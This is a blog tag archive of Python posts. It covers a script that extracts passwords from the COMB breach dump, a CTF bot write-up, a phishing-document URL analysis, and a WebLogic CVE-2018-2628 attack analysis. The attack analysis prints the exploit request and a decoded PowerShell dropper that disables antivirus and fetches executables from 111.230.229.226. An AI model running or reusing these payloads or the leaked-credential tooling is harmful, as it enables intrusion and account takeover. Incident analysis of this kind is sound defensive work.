Tag Archives: python

Extracting password from data leaks dump files

Recently I read about this data leak: COMB, the largest breach of all time, leaked online with 3.2 billion records.

According to the article, it is known as “Compilation of Many Breaches” (COMB). The data was leaked on a popular hacking forum. It contains billions of user credentials from past leaks from Netflix, LinkedIn, Exploit.in, Bitcoin and more, as email and password pairs.

Inside the data dump, it was structured something like this:

CompilationOfManyBreaches
  folderdata
    folder1
       file0
       file1
    folder2
       file0
       file1

Each file contains lines in the form email:password.

So I wondered… what if we extract just the email or just the password from all those files? We could build a password list from that, or analyze password trends and see which passwords are used most.

So… we’re not going through hundreds of files totalling 100GB+ to extract the passwords manually… That’s crazy, ma man!

To make it easier, I’ve created a Python script that recursively extracts the passwords from all the dump files. The code is as below:

#!/usr/bin/env python3
import os
from timeit import default_timer as timer
from datetime import timedelta

inputfile = "/Desktop/test/data"  # change this to your dump files location

outputfile = open("extracted_password.txt", "w")

print("\nStart extracting...")
start = timer()

for path, dirs, files in os.walk(inputfile):
    for filename in files:
        fullpath = os.path.join(path, filename)
        # dump files are not guaranteed to be valid UTF-8, so don't let a bad byte abort the run
        with open(fullpath, "r", errors="replace") as f:
            for line in f:
                # split on the first ":" only, so passwords that themselves contain ":" stay intact
                email, sep, password = line.partition(":")
                if not sep:
                    continue  # line is not in email:password form, skip it
                # normalise the line ending so the last line of one file never merges with the next file
                outputfile.write(password.rstrip("\r\n") + "\n")

outputfile.close()

print("Finish!\n")
end = timer()
print("Time Taken: ", end='')
print(timedelta(seconds=end - start))

Save the code above & run the script:

$ python password_extractor.py

It may take some time depending on your hardware resources and dump file size. You should see output like this after the script finishes:

When it completes, you should see a new file named “extracted_password.txt”. It contains all the passwords from all the dump files, consolidated into one single big-ass file.

Now we can start analyzing the password patterns. We can use the command below to see the top 10 passwords:

$ time sort extracted_password.txt | uniq -c | sort -bgr | head -10

Happy hunting & analyzing! 🙂

Global Community CTF: Mini Bootup by SANS – NM02

Question:

This server is trying to get us to run some calculations but it's just too fast for us. Can you work out a way to solve this?

Domain: cgames-nm02.allyourbases.co Port: 9010

Let’s try connecting to the given domain & port via netcat:

Hmm. There are math questions we need to solve, but we’re too slow at solving them..

What if we create a bot to solve those questions?

import pwn

host, port = 'cgames-nm02.allyourbases.co', 9010
session = pwn.remote(host, port)

while True:
    try:
        what = session.recv(1024).decode()
        questionrm = what.replace('=', '').strip()  # remove "=" so only the expression is left
        print("Q: " + questionrm)

        math = eval(questionrm)  # evaluate the arithmetic the server sent
        math_str = str(math)
        print("AS: " + math_str)

        session.sendline(math_str.encode())
        print(session.recvline())
    except EOFError:
        print('Done!')
        break

session.close()

Save it & run. Watch the magic happen…
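The eval() call in the bot executes whatever the server sends. Below is an added example (not from the original post) of a drop-in replacement that only accepts plain arithmetic, assuming the prompt format is an expression followed by “=”:

```python
import ast
import operator

# Operators the arithmetic questions are assumed to use; anything else (names,
# attribute access, calls, subscripts) is refused instead of being evaluated.
_BIN_OPS = {
    ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul,
    ast.Div: operator.truediv, ast.FloorDiv: operator.floordiv,
    ast.Mod: operator.mod, ast.Pow: operator.pow,
}
_UNARY_OPS = {ast.USub: operator.neg, ast.UAdd: operator.pos}


def _eval_node(node):
    """Walk the AST and only allow numeric literals and arithmetic operators."""
    if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
        return node.value
    if isinstance(node, ast.BinOp) and type(node.op) in _BIN_OPS:
        left, right = _eval_node(node.left), _eval_node(node.right)
        if isinstance(node.op, ast.Pow) and abs(right) > 64:
            raise ValueError("exponent too large")  # refuse to burn CPU on 9**9**9
        return _BIN_OPS[type(node.op)](left, right)
    if isinstance(node, ast.UnaryOp) and type(node.op) in _UNARY_OPS:
        return _UNARY_OPS[type(node.op)](_eval_node(node.operand))
    raise ValueError("not a plain arithmetic expression: " + ast.dump(node))


def solve_question(raw: bytes) -> str:
    """Turn a prompt such as b'12 * 34 = ' into the answer string '408'.
    Assumed prompt format: the expression is everything before the first '='."""
    text = raw.decode("ascii", errors="ignore")
    expr = text.split("=", 1)[0].strip()
    tree = ast.parse(expr, mode="eval")
    result = _eval_node(tree.body)
    # integer-valued floats (e.g. 8 / 2) are sent as '4', not '4.0'
    if isinstance(result, float) and result.is_integer():
        result = int(result)
    return str(result)


def is_plain_arithmetic(raw: bytes) -> bool:
    """True when the prompt can be solved, False when it carries anything else."""
    try:
        solve_question(raw)
        return True
    except (ValueError, SyntaxError, ZeroDivisionError):
        return False


if __name__ == "__main__":
    print(solve_question(b"12 * 34 = "))
    print(is_plain_arithmetic(b"__import__('os').system('id') ="))
```

In the bot, replace `math = eval(questionrm)` with `math_str = solve_question(what)` and send that.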

The flag is: SuperServer1337

Analyzing Phishing Email – Word XML File Analysis

Recently I observed a phishing mail as below:
https://www.virustotal.com/#/file/cf027dd938f1a268f45f2ea786dc538ab47f35006fb12d0b64e0867bccf789c0/detection – clean

The file seems to be clean per VT. Interestingly, in the Details section, I found 2 URLs under OpenXML Doc Info, section Package Relationships:

To search for these URLs, first you’ll need to rename the Word doc file to a compressed zip file, e.g. sample.doc to sample.zip.

Then extract the zip file. The URLs can be found inside the file document.xml.rels (~/sample_folder/word/_rels/):

It may look simple if you know which file to look at and where.

I’m thinking: what if we could search for all the URLs/hyperlinks in the XML content of the Word document, without having to open the files one by one?

To do that, we’ll use the zipdump and re-search (together with reextra) Python script tools by Didier Stevens:

Download the Python scripts mentioned above and put them in one place. Then execute the command below:

./zipdump.py -D sample.zip | ./re-search.py -f -n url -u

The command above dumps the content of every file inside the zip and applies a regex search for URLs to it.

As you can see below, these are all the URLs contained in the Word doc:
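The same search done in plain Python, as an added example that is not Didier Stevens’ code: it walks every XML and .rels member of an OOXML zip with the zipfile module and applies a URL regex, dropping the OOXML namespace URIs so only the document’s real links remain. The sample document and its phish.example URLs are constructed here, not taken from the real attachment:

```python
import io
import re
import zipfile

# Same idea as re-search's "url" pattern: a URL runs until whitespace or an XML quote/bracket.
URL_RE = re.compile(r"https?://[^\s\"'<>]+")

# OOXML is full of namespace URIs; they are not links the document points at, so drop them.
NAMESPACE_PREFIXES = (
    "http://schemas.openxmlformats.org/",
    "http://schemas.microsoft.com/",
    "http://www.w3.org/",
    "http://purl.org/",
)


def urls_in_office_doc(data: bytes) -> dict:
    """Map each XML/.rels member of an OOXML zip to the external URLs it contains."""
    found = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not name.endswith((".xml", ".rels")):
                continue  # binary parts (images, fonts, OLE objects) need a different check
            text = zf.read(name).decode("utf-8", errors="replace")
            urls = sorted(
                u for u in set(URL_RE.findall(text)) if not u.startswith(NAMESPACE_PREFIXES)
            )
            if urls:
                found[name] = urls
    return found


def build_sample_docx() -> bytes:
    """CONSTRUCTED stand-in for the phishing attachment: a minimal OOXML package whose
    relationships file carries two external hyperlinks, like the one in the post."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        '<Relationship Id="rId1" TargetMode="External" Target="http://phish.example/login" '
        'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/>'
        '<Relationship Id="rId2" TargetMode="External" Target="https://phish.example/verify?id=1" '
        'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/>'
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document>Please verify your account.</w:document>")
        zf.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    for member, urls in urls_in_office_doc(build_sample_docx()).items():
        print(member, "->", ", ".join(urls))
```

To run it on a real attachment, pass `open("sample.zip", "rb").read()` to `urls_in_office_doc` instead of the constructed sample.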

Analyzing Oracle WebLogic attack

Recently we received an alert from our WAF related to an attack against our environment.

Further review of the alert found that the attacker was using the Oracle WebLogic RCE deserialization vulnerability (CVE-2018-2628).

We observed that the attacker included a PowerShell command in their request:

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="3">
    <void index="0">
      <string>cmd.exe</string>
    </void>
    <void index="1">
      <string>/c</string>
    </void>
    <void index="2">
      <string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
    </void>
  </array>
    <void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

It seems the PowerShell command is using Base64 encoding for obfuscation. I used CyberChef to decode the base64. This is the result after decoding it:

$OS=(GWmi Win32_OperatingSystem).Caption;$WC=New-Object Net.WebClient;$WC.Headers['User-Agent']="PowerShell/WL+ $OS";IEX $WC.DownloadString('http://111.230.229.226/images/test/DL.php');

It seems it tried to fetch the file DL.php at http://111.230.229.226/images/test/DL.php. Let’s try to grab that file:

[email protected]:~# wget http://111.230.229.226/images/test/DL.php
--2018-04-29 19:50:27--  http://111.230.229.226/images/test/DL.php
Connecting to 111.230.229.226:80... connected.
HTTP request sent, awaiting response... 404 Not Found
2018-04-29 19:50:28 ERROR 404: Not Found.

Hmm.. Error 404..? Is it a real error? Or are we missing something here?

Let’s analyze the command carefully:

PS C:\Users\Fossil\Desktop> $OS=(GWmi Win32_OperatingSystem).Caption;
PS C:\Users\Fossil\Desktop> $WC=New-Object Net.WebClient;
PS C:\Users\Fossil\Desktop> $WC.Headers['User-Agent']="PowerShell/WL+ $OS";
PS C:\Users\Fossil\Desktop>
PS C:\Users\Fossil\Desktop> echo $OS;
Microsoft Windows 7 Ultimate
PS C:\Users\Fossil\Desktop> echo $WC.Headers['User-Agent'];
PowerShell/WL+ Microsoft Windows 7 Ultimate

We can see the attacker assigns a specific User-Agent when fetching the file. That’s why our direct wget/curl of the file failed: the server only answers requests carrying that User-Agent.

So what we need to do is set the User-Agent exactly as above when fetching the file. In this case, I’m using curl to fetch it:

[email protected]:~# curl -v -H "User-Agent: PowerShell/WL Microsoft Windows 7 Professional" http://111.230.229.226/images/test/DL.php
*   Trying 111.230.229.226...
* Connected to 111.230.229.226 (111.230.229.226) port 80 (#0)
> GET /images/test/DL.php HTTP/1.1
> Host: 111.230.229.226
> Accept: */*
> User-Agent: PowerShell/WL Microsoft Windows 7 Professional
<
< HTTP/1.1 200 OK
< Date: Sun, 29 Apr 2018 11:50:23 GMT
< Server: Apache/2.2.21 (Win32) PHP/5.3.10
< X-Powered-By: PHP/5.3.10
< Content-Length: 2539
< Content-Type: text/html
<
$EncodedCompressedFile = '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';$DeflatedStream = New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String($EncodedCompressedFile),[IO.Compression.CompressionMode]::Decompress);$UncompressedFileBytes = New-Object Byte[](3948);$Null=$DeflatedStream.Read($UncompressedFileBytes, 0, 3948);([Text.Encoding]::ASCII.GetString($UncompressedFileBytes)) | IEX;

Ah.. Now you see, young padawan? Previously, when the file was fetched without that User-Agent, the server threw a 404 error. Again, we see another set of base64 encoding here.

But what is it?

I’m no expert at explaining this, but TL;DR, it converts the base64-encoded string to a memory stream and executes it. I guess ¯\_(ツ)_/¯

So, to see what happens if this command executes, we can use the Python script below to decode it. With this script, we can basically see what that base64 is doing.

We’ll create a Python script named “decodeb64.py“. Copy the base64 we found above and paste it as the value of the encoded variable, as in the example below:

#!/usr/bin/env python3
import base64
import zlib

encoded = "<paste the $EncodedCompressedFile base64 string from DL.php here>"

# [Convert]::FromBase64String
decoded = base64.b64decode(encoded)

# IO.Compression.DeflateStream
# wbits=-15 tells zlib to expect raw DEFLATE data with no zlib/gzip header,
# which is what .NET's DeflateStream produces
decompressed = zlib.decompress(decoded, -15)

# [Text.Encoding]::ASCII.GetString
print(decompressed.decode("ascii", errors="replace"))

Save the script and run it as below:

C:\Users\Fossil\Desktop>python decodeb64.py > output_DL_php.txt

This redirects all the script’s output from your CMD window to a text file, which is easier to read.
P/S: You can rename output_DL_php.txt to any filename that you want.

Let’s see what’s inside the text file:

$MutexName = 'Global\20180419'
$bCreated = $Flase
$hMutex = New-Object System.Threading.Mutex($true,$MutexName,[Ref]$bCreated)
if ($bCreated)
{
        Start-Sleep 180
        $hMutex.ReleaseMutex()
}
else
{
        Exit
}


#Update
$WmiName = 'root\cimv2:PowerShell_Command'
$mPId=$Null;$mPId = ([WmiClass] $WmiName).Properties['mPId'].Value
if ($mPId -ne $Null) {
        Write-Host "[i] Old PId: $mPId"
        Get-Process -Id $mPId -ErrorAction SilentlyContinue | Stop-Process -Force
}
$WmiName = 'root\default:PowerShell_Command'
$mPId=$Null;$mPId = ([WmiClass] $WmiName).Properties['mPId'].Value
if ($mPId -ne $Null) {
        Write-Host "[i] Old PId: $mPId"
        Get-Process -Id $mPId -ErrorAction SilentlyContinue | Stop-Process -Force
}


$SrvName = "ZhuDongFangYu", "NisSrv","MsMpSvc","WdNisSvc","WinDefend", "MBAMService","a2AntiMalware"
foreach ($Srv in $SrvName)
{
#       Set-Service -Name $Srv -StartupType Disabled -ErrorAction SilentlyContinue
#       Stop-Service -Name $Srv -Force -ErrorAction SilentlyContinue
        $Null = SC.exe Config $Srv Start= Disabled
        $Null = SC.exe Stop $Srv
}
$ProName = "ZhuDongFangYu", "MsMpEng","MpCmdRun","msseces","NisSrv","MSASCui", "mbamtray","mbamservice","a2service"
foreach ($Pro in $ProName)
{
        Get-Process -Name $Pro -ErrorAction SilentlyContinue | Stop-Process -Force
}

$Null = Reg.exe Add "HKLM\SoftWare\Microsoft\Windows Defender\SpyNet" /v "SpyNetReporting" /t REG_DWORD /d 0 /f
$Null = Reg.exe Add "HKLM\SoftWare\Microsoft\Windows Defender\Exclusions\Paths" /v "$Env:WinDir" /t REG_DWORD /d 0 /f
$Null = Reg.exe Add "HKLM\SoftWare\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
$Null = Reg.exe Add HKLM\System\CurrentControlSet\Services\NisSrv /v Start /t REG_DWORD /d 4 /f
$Null = Reg.exe Add HKLM\System\CurrentControlSet\Services\MsMpSvc /v Start /t REG_DWORD /d 4 /f
$Null = Reg.exe Add HKLM\System\CurrentControlSet\Services\WdNisSvc /v Start /t REG_DWORD /d 4 /f
$Null = Reg.exe Add HKLM\System\CurrentControlSet\Services\WinDefend /v Start /t REG_DWORD /d 4 /f


$Script = "Start-Sleep (Get-Random -Min 60 -Max 300);IEX (New-Object Net.WebClient).DownloadString('http://111.230.229.226/images/def/DL.ps1');";
$ScriptBytes = [System.Text.Encoding]::Unicode.GetBytes($Script);
$EncodedScript = [System.Convert]::ToBase64String($ScriptBytes);

$Path = "$Env:SystemRoot\System32\WindowsPowerShell\v1.0\PowerShell.exe"
$Argv = "-NoP -NonI -EP ByPass -W Hidden -E $EncodedScript"
$Process = Start-Process -FilePath $Path -ArgumentList $Argv -WindowStyle Hidden -PassThru
$ProcessId = $($Process.Id)
if ($ProcessId -ne $Null)
{
        Write-Host "[+] Neutrino PS Process Id is $ProcessId"
}
else
{
        Write-Host "[-] Neutrino PS Process Id is NULL"
}


#Downloader
$x86 = "http://111.230.229.226/images/test/x86.exe"
$x64 = "http://111.230.229.226/images/test/x64.exe"
$File = "$Env:WinDir\Temp\lsass.eXe"
$WC = New-Object System.Net.WebClient


$Dir = "$Env:WinDir\Temp";
if (!(Test-Path $Dir)){ New-Item $Dir -Type Directory; }
if (!((Get-Item $File -Force) -is [IO.FileInfo])) { Remove-Item $File -Force -ErrorAction SilentlyContinue }


$OS = (Get-WmiObject Win32_ComputerSystem).SystemType
$SO = (Get-WmiObject Win32_OperatingSystem).OSArchitecture
if (($OS -Match '64') -Or ($SO -Match '64'))
{
        Write-Host "[i] OS 64-bit"
        $WC.DownloadFile($x64, $File)
        if ((Test-Path $File) -eq $False)
        {
                $WC.DownloadFile("http://111.230.229.226/images/test/x64_VMP.exe", $File)
        }
}
else
{
        Write-Host '[i] OS 32-bit'
        $WC.DownloadFile($x86, $File)
        if ((Test-Path $File) -eq $False)
        {
                $WC.DownloadFile("http://111.230.229.226/images/test/x86_VMP.exe", $File)
        }
}

if (Test-Path $File)
{
        Write-Host '[+] Downloaded'
        $Null = NetSH Firewall Add AllowedProgram $File "Windows Update" Enable
        IEX $WC.DownloadString('http://111.230.229.226/images/test/WMI.ps1')
}
else
{
        Write-Host '[-] Fail To Download'
}

As you can see, the command is doing a bunch of stuff that I’m lazy to explain 😉
Hope you enjoy reading this.
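The two encodings met in this post, the -E argument (base64 over UTF-16LE) and DL.php’s $EncodedCompressedFile (base64 over raw DEFLATE), unwrapped by one added script that is not part of the original post. It uses the -E blob from the SOAP request above as real input; the second-stage sample and its example.invalid URL are constructed here rather than re-typing the real DL.php blob:

```python
import base64
import re
import zlib

# The -E argument from the WebLogic SOAP request on this page: base64 over UTF-16LE text.
ENCODED_COMMAND = "JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA=="


def decode_encoded_command(b64: str) -> str:
    """Undo PowerShell -E / -EncodedCommand: base64 of the script as UTF-16LE."""
    return base64.b64decode(b64).decode("utf-16-le")


def decode_deflate_layer(b64: str) -> str:
    """Undo [Convert]::FromBase64String + IO.Compression.DeflateStream.
    wbits=-15 means raw DEFLATE with no zlib/gzip header, which is what
    .NET's DeflateStream produces; the sample then reads it as ASCII."""
    return zlib.decompress(base64.b64decode(b64), -15).decode("ascii", errors="replace")


def unwrap(b64: str) -> str:
    """Pick the layer by inspecting the bytes: UTF-16LE ASCII text has a zero
    high byte in every code unit, compressed data does not."""
    raw = base64.b64decode(b64)
    if len(raw) % 2 == 0 and not any(raw[1::2]):
        return raw.decode("utf-16-le")
    return zlib.decompress(raw, -15).decode("ascii", errors="replace")


URL_RE = re.compile(r"https?://[^\s'\"()]+")


def extract_urls(script: str) -> list:
    """Next-stage download locations: the IOCs a responder wants from each layer."""
    return sorted(set(URL_RE.findall(script)))


def raw_deflate_b64(text: str) -> str:
    """Build a DL.php-style blob (used here only to CONSTRUCT a test sample)."""
    co = zlib.compressobj(wbits=-15)
    return base64.b64encode(co.compress(text.encode("ascii")) + co.flush()).decode("ascii")


# CONSTRUCTED stand-in for DL.php's $EncodedCompressedFile; the real one is shown in the post.
SAMPLE_STAGE2 = raw_deflate_b64(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
)

if __name__ == "__main__":
    for blob in (ENCODED_COMMAND, SAMPLE_STAGE2):
        script = unwrap(blob)
        print(script)
        print("URLs:", extract_urls(script))
```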

Here are some of the IOCs that I managed to gather:


References:
https://gist.githubusercontent.com/strazzere/5faa709a3db9e1dcf3b5/raw/42b98a918bac3725934bcfa3087ac5936d9b88d1/decrypt.py
http://threat.tevora.com/5-minute-forensics-decoding-powershell-payloads/

Upgrade Python packages using pip

As the title says: how to update all your Python packages via pip.

for Linux/*nix:

pip freeze --local | grep -v '^\-e' | cut -d = -f 1  | xargs -n1 pip install -U

p/s: you may need to run as sudo. Probably.

for Windows:

for /F "delims===" %i in ('pip freeze -l') do pip install -U %i

Credit:

http://stackoverflow.com/questions/2720014/upgrading-all-packages-with-pip

Python Error – InsecurePlatformWarning

One time I saw this kind of error:

InsecurePlatformWarning: A true SSLContext object is not available.
This prevents urllib3 from configuring SSL appropriately and may cause certain SSL connections to fail.
For more information, see https://urllib3.readthedocs.org/en/latest/security.html#insecureplatformwarning.
InsecurePlatformWarning

If you’re on Ubuntu, you may run into trouble installing pyopenssl, so you’ll need these dependencies:

apt-get install libffi-dev libssl-dev

Then you’ll only need to install the security package extras:

pip install requests[security]

or, install them directly via pip:

pip install pyopenssl ndg-httpsclient pyasn1

The requests library will then automatically inject pyOpenSSL into urllib3.

Credit:
http://stackoverflow.com/questions/29134512/insecureplatformwarning-a-true-sslcontext-object-is-not-available-this-prevent

Python Error – ImportError: No module named pkg_resources

One time I tried to install some Python packages via pip install from a requirements file, but I encountered an error like this:

    from pkg_resources import load_entry_point
ImportError: No module named pkg_resources

To fix the issue, run the setup script for setuptools:

wget https://bitbucket.org/pypa/setuptools/raw/bootstrap/ez_setup.py -O - | python

Yeah, it solved my problem. Probably. XD

Credit:
http://stackoverflow.com/questions/7446187/no-module-named-pkg-resources

Maltrieve on Mac OS X

Maltrieve originated as a fork of mwcrawler. It retrieves malware directly from the sources listed at a number of sites, including:

  • Malc0de
  • Malware Black List
  • Malware Domain List
  • VX Vault
  • URLquery
  • CleanMX

If you want to install maltrieve on your Mac OS X, below are the steps to install it.

  • First, install beautifulsoup4 via pip:
sudo pip install beautifulsoup4
  • Install the required dependencies via MacPorts:
sudo port install libxml2 libxslt py-lxml
  • Download maltrieve from GitHub and run it:
sudo git clone https://github.com/technoskald/maltrieve.git
cd maltrieve
python maltrieve.py -d pull -l maltrieve.log

Done. Now you can use the Maltrieve on your Mac OS X.

Install pip on Ubuntu 12.04

Install pip and virtualenv for Ubuntu 10.10 Maverick and newer

sudo apt-get install python-pip python-dev build-essential
sudo pip install --upgrade pip
sudo pip install --upgrade virtualenv

For older versions of Ubuntu
Install Easy Install

sudo apt-get install python-setuptools python-dev build-essential

Install pip

sudo easy_install pip

Install virtualenv

sudo pip install --upgrade virtualenv

I advise you to reboot your server first after installing the python-pip package.